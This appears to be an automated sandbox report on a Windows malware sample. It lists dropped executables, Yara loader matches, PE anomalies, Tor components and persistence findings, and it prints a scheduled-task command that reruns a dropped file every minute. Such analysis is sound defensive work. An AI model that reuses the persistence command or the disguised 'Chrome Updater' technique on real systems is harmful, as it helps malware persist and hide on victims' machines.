Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb.bwe\ source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb. source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831$+ source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ue source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdbDC source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb.ookies\ source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb.batory source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\8F82.exe source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2044956338.0000024C2EF9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb* source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2029399466.000000000857D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.load.error( source: AppLaunch.exe, 00000009.00000002.2026868148.0000000008377000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 44.2.IdentityReference.exe.1af1055e76a.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d94c209d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.IdentityReference.exe.1af1065e658.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d949bd698.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d94b30968.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d94b08930.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d94b30968.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d94b08930.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.D9EC.exe.1e951c9cbd8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.D9EC.exe.1e96a7a0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.IdentityReference.exe.1af1055e76a.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d84460000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.IdentityReference.exe.1af1065e658.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.D9EC.exe.1e96a7a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.3059749646.000001AF10492000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2357995351.000001AF00212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2317887669.000001E96A7A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2357995351.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2357995351.000001AF0021A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2208933184.000001E951CD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2357995351.000001AF001FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2261083821.0000027D84460000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2368041511.0000027D949BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.3059749646.000001AF1065E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2357995351.000001AF001FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2264896125.0000027D84541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2368041511.0000027D94C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

.NET source code contains potential unpacker

Source: D9EC.exe.11.dr, -.cs

.Net Code: _E009 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Code function: 0_2_00FC724D push ecx; ret	0_2_00FC7260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Code function: 1_2_004C724D push ecx; ret	1_2_004C7260
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Code function: 2_2_00ED724D push ecx; ret	2_2_00ED7260
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008525F4 push ecx; ret	3_2_0087C433
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00A031AE push esp; iretd	3_2_00A031B6
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00A03256 push 0000002Fh; retf	3_2_00A03276
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00A0366F push edx; ret	3_2_00A03676
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E825F4 push ecx; ret	6_2_00EAC433
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0108097F push 8BFFFFFDh; iretd	6_2_01080984
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0107E154 push 8BFFFFFEh; iretd	6_2_0107E159

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

Code function: 0_2_00FC202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,

0_2_00FC202A

Source: 7FE0.exe.11.dr

Static PE information: 0xB1152F74 [Sat Feb 23 01:27:16 2064 UTC]

Source: 2zx1310.exe.2.dr	Static PE information: section name: .dmm
Source: 2zx1310.exe.2.dr	Static PE information: section name: .00cfg
Source: 4ZZ099qJ.exe.2.dr	Static PE information: section name: .dmm
Source: 4ZZ099qJ.exe.2.dr	Static PE information: section name: .00cfg
Source: 853C.exe.11.dr	Static PE information: section name: .xdata
Source: 9AED.exe.11.dr	Static PE information: section name: .bqwrxyb
Source: 9AED.exe.11.dr	Static PE information: section name: .rcqwrbs
Source: C4AD.exe.11.dr	Static PE information: section name: .xdata

Source: 8427.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x7596d
Source: 8F82.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x1c9db
Source: D9EC.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x1059cb
Source: 2zx1310.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x20708a
Source: 4ZZ099qJ.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x3448aa
Source: 6rR8iy1.exe.0.dr	Static PE information: real checksum: 0x23bfb should be: 0x34bf0
Source: 7FE0.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x45b29
Source: 9AED.exe.11.dr	Static PE information: real checksum: 0x77af1 should be: 0x6f581

Source: initial sample	Static PE information: section name: .text entropy: 7.047633597935999
Source: initial sample	Static PE information: section name: .text entropy: 7.928082631432437

Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	File created: C:\Users\user\AppData\Local\Temp\yXVRjmzZGPJCMmF.data			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	File created: C:\Users\user\AppData\Local\Temp\GtxAoNQLNDxAZTy.data			Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\8F82.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\libssp-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8427.exe	File created: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe	Jump to dropped file
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\39D.exe	File created: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\853C.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D9EC.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7FE0.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\616D.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	File created: C:\Users\user\AppData\Local\Temp\yXVRjmzZGPJCMmF.data	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8427.exe	File created: C:\Users\user\AppData\Local\932079.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\39D.exe	File created: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8427.exe	File created: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\libevent_core-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	File created: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\libevent-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\39D.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8427.exe	File created: C:\Users\user\AppData\Local\Temp\x64\SQLite.Interop.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\zlib1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8427.exe	File created: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.EF6.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\39D.exe	File created: C:\Users\user\AppData\Local\Temp\latestX.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C4AD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\libwinpthread-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\39D.exe	File created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8427.exe	File created: C:\Users\user\AppData\Local\Temp\x86\SQLite.Interop.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\libgcc_s_sjlj-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8427.exe	File created: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\libevent_extra-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	File created: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9AED.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\libssl-1_1.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\61F6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	File created: C:\Users\user\AppData\Local\Temp\GtxAoNQLNDxAZTy.data	Jump to dropped file
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\8427.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File created: C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-gencert.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Jump to dropped file

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Code function: 0_2_00FC1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	0_2_00FC1AE8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Code function: 1_2_004C1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	1_2_004C1AE8
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Code function: 2_2_00ED1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	2_2_00ED1AE8

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "8F82" /sc MINUTE /tr "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" /rl LIMITED /f

Source: C:\Users\user\AppData\Local\Temp\8427.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Updater.lnk

Source: C:\Users\user\AppData\Local\Temp\8427.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Updater.lnk

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9090
Source: unknown	Network traffic detected: HTTP traffic on port 9090 -> 49766

May use the Tor software to hide its network traffic

Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp

Binary or memory string: onion-port

Source: C:\Users\user\AppData\Local\Temp\8427.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
